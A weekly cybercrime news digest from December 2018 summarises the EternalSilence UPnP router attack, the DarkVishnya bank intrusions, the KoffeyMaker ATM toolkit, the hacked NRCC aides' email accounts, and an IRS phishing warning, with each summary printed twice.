CyberCrime - W/E - 12/6/18
"EternalSilence" Attack Abuses UPnP Protocol to Compromise Routers (12/05/2018)
Akamai is exposing details about how an attack method that it earlier described as affecting routers using vulnerable implementations of the Universal Plug and Play (UPnP) protocol goes a step further. Criminals are now using UPnP's port mapping feature, chained with the EternalBlue and EternalRed exploits to attack machines running Windows SMB and Linux Samba. This "EternalSilence" attack has hit at least 45,000 routers by using a port mapping injection. However, Akamai warns that even more routers might be infected and that number could reach well over one million.
Akamai is exposing details about how an attack method that it earlier described as affecting routers using vulnerable implementations of the Universal Plug and Play (UPnP) protocol goes a step further. Criminals are now using UPnP's port mapping feature, chained with the EternalBlue and EternalRed exploits to attack machines running Windows SMB and Linux Samba. This "EternalSilence" attack has hit at least 45,000 routers by using a port mapping injection. However, Akamai warns that even more routers might be infected and that number could reach well over one million.
DarkVishnya Bank Attacks Used Planted Devices to Siphon Money (12/05/2018)
Kaspersky Lab has published analysis related to attacks on banks in Eastern Europe that resulted in the loss of tens of millions of dollars and can be attributed to a campaign called "DarkVishnya." Each attack used one of three tools planted inside the network: a netbook or inexpensive laptop; a Raspberry Pi computer; or Bash Bunny, a special tool for carrying out USB attacks. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem. At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, Web servers, and any other open resources. The aim was to harvest information about the network, mainly servers and workstations used for making payments. The attackers also tried to brute-force or sniff login data for such machines. At the third stage, the hackers logged into the target system and used remote access software to retain access. Malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies.
Kaspersky Lab has published analysis related to attacks on banks in Eastern Europe that resulted in the loss of tens of millions of dollars and can be attributed to a campaign called "DarkVishnya." Each attack used one of three tools planted inside the network: a netbook or inexpensive laptop; a Raspberry Pi computer; or Bash Bunny, a special tool for carrying out USB attacks. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem. At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, Web servers, and any other open resources. The aim was to harvest information about the network, mainly servers and workstations used for making payments. The attackers also tried to brute-force or sniff login data for such machines. At the third stage, the hackers logged into the target system and used remote access software to retain access. Malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies.
Kaspersky Lab Probes "KoffeeMaker" to Uncover Details of ATM Heists (12/04/2018)
Kaspersky Lab's team investigated KoffeyMaker, a malicious toolkit that was used by cyber thieves to raid ATMs belonging to Eastern European banks. Analysis revealed the "crime instrument" to be a laptop with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a connection to a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7 for better driver compatibility. Legitimate tools were used to carry out the attack with the exception of the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a. This is the same version of this program was previously used by cybercriminals from the Carbanak group.
Kaspersky Lab's team investigated KoffeyMaker, a malicious toolkit that was used by cyber thieves to raid ATMs belonging to Eastern European banks. Analysis revealed the "crime instrument" to be a laptop with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a connection to a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7 for better driver compatibility. Legitimate tools were used to carry out the attack with the exception of the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a. This is the same version of this program was previously used by cybercriminals from the Carbanak group.
Report: Four NRCC Officials Had Email Accounts Hacked (12/05/2018)
A cyber intrusion hit several email accounts for senior aides affiliated with the National Republican Congressional Committee during the mid-term elections, anonymous officials told Politico. The accounts for four aides were hacked and kept under surveillance for several months until being detected in April. House Speaker Paul Ryan and several other senior officials were not notified of the attacks until Politico contacted them on December 4. Committee officials said they refrained from contacting Ryan and the others because they were conducting an internal investigation. Details were not disclosed on how exactly long the cyber intrusion took place or who had been behind it.
A cyber intrusion hit several email accounts for senior aides affiliated with the National Republican Congressional Committee during the mid-term elections, anonymous officials told Politico. The accounts for four aides were hacked and kept under surveillance for several months until being detected in April. House Speaker Paul Ryan and several other senior officials were not notified of the attacks until Politico contacted them on December 4. Committee officials said they refrained from contacting Ryan and the others because they were conducting an internal investigation. Details were not disclosed on how exactly long the cyber intrusion took place or who had been behind it.
Thieves Use Tax Season, Holidays to Elicit Money in Phishing Scams (12/05/2018)
As the holidays and 2019 tax filing season loom, the Internal Revenue Service (IRS) is warning businesses and consumers to be aware of a surge in sophisticated phishing scams. Phishing attacks use email or malicious Web sites to solicit personal, tax, or financial information by posing as a trustworthy organization. IRS Commissioner Chuck Rettig said, "The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails."
As the holidays and 2019 tax filing season loom, the Internal Revenue Service (IRS) is warning businesses and consumers to be aware of a surge in sophisticated phishing scams. Phishing attacks use email or malicious Web sites to solicit personal, tax, or financial information by posing as a trustworthy organization. IRS Commissioner Chuck Rettig said, "The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails."